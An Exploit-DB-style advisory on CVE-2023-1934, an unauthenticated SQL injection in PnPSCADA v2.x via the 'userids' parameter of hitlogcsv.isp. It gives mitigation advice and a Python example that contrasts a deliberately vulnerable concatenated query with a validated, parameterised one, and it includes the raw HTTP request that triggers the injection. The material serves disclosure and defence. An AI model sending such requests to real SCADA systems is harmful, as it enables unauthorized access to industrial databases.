Vendor: PnPSCADA
By: Momen Eldawakhly
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: PnPSCADA
Affected Version From: PnPSCADA v2.x
Affected Version To: PnPSCADA v2.x
Patch Exists: NO
Related CVE: CVE-2023-1934
CPE: a:pnpscada:pnpscada:2.0
Platforms Tested: Unix
Year: 2023

PnPSCADA v2.x – Unauthenticated PostgreSQL Injection

This exploit allows an attacker to perform unauthenticated SQL injection in PnPSCADA v2.x. By manipulating the 'userids' parameter in the 'hitlogcsv.isp' endpoint, an attacker can inject malicious SQL queries and potentially gain unauthorized access to the backend database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Additionally, implementing proper access controls and authentication mechanisms can help prevent unauthorized access to the database.
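
The mitigation above, as an added example that is not PnPSCADA's code (the page does not show the backend): the `1337'` value from the request in the raw data breaks a query built by string concatenation, while allow-list validation plus bound parameters rejects it before any SQL runs. Assumptions: the `hitlog` table, its columns and all function names are hypothetical, `userids` is taken to be a comma-separated list of numeric IDs, and in-memory SQLite stands in for PostgreSQL so the block runs offline.

```python
import re
import sqlite3

# Assumption: userids is a comma-separated list of numeric IDs.
_USERIDS_RE = re.compile(r"[0-9]{1,10}(?:,[0-9]{1,10})*")

def parse_userids(raw):
    """Allow-list validation: return a list of ints or raise ValueError."""
    if not _USERIDS_RE.fullmatch(raw):
        raise ValueError("userids must be comma-separated integers")
    return [int(part) for part in raw.split(",")]

def query_vulnerable(conn, raw):
    # 'Before' form: the request value becomes part of the SQL text.
    sql = "SELECT userid, hit_at FROM hitlog WHERE userid IN (" + raw + ")"
    return conn.execute(sql).fetchall()

def query_hardened(conn, raw):
    ids = parse_userids(raw)
    marks = ",".join("?" for _ in ids)  # one bind marker per validated id
    sql = ("SELECT userid, hit_at FROM hitlog "
           f"WHERE userid IN ({marks}) ORDER BY userid")
    return conn.execute(sql, ids).fetchall()

def demo_db():
    # Constructed sample data in a hypothetical table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE hitlog (userid INTEGER, hit_at TEXT)")
    conn.executemany("INSERT INTO hitlog VALUES (?, ?)",
                     [(1337, "2022-12-13 08:00"), (42, "2022-12-13 08:13")])
    return conn

def crash_point_outcomes():
    """Feed the page's userids value to both query builders."""
    conn = demo_db()
    raw = "1337'"
    try:
        query_vulnerable(conn, raw)
        vulnerable = "ok"
    except sqlite3.OperationalError:  # unbalanced quote reaches the SQL parser
        vulnerable = "sql-error"
    try:
        query_hardened(conn, raw)
        hardened = "ok"
    except ValueError:  # rejected before any SQL is built
        hardened = "rejected"
    return vulnerable, hardened
```

With a PostgreSQL driver the same pattern applies using that driver's own bind-marker syntax in place of `?`.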

Exploit-DB raw data:

# Exploit Title: PnPSCADA v2.x - Unauthenticated PostgreSQL Injection
# Date: 15/5/2023
# Exploit Author: Momen Eldawakhly (Cyber Guy) at Samurai Digital Security Ltd
# Vendor Homepage: https://pnpscada.com/
# Version: PnPSCADA (cross platforms): v2.x
# Tested on: Unix
# CVE : CVE-2023-1934
# Proof-of-Concept: https://drive.google.com/drive/u/0/folders/1r_HMoaU3P0t-04gMM90M0hfdBRi_P0_8

SQLi crashing point:

GET /hitlogcsv.isp?userids=1337'&startdate=2022-12-138200083A0093A00&enddate=2022-12-138201383A1783A00 HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14
Host: vulnerablepnpscada.int
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close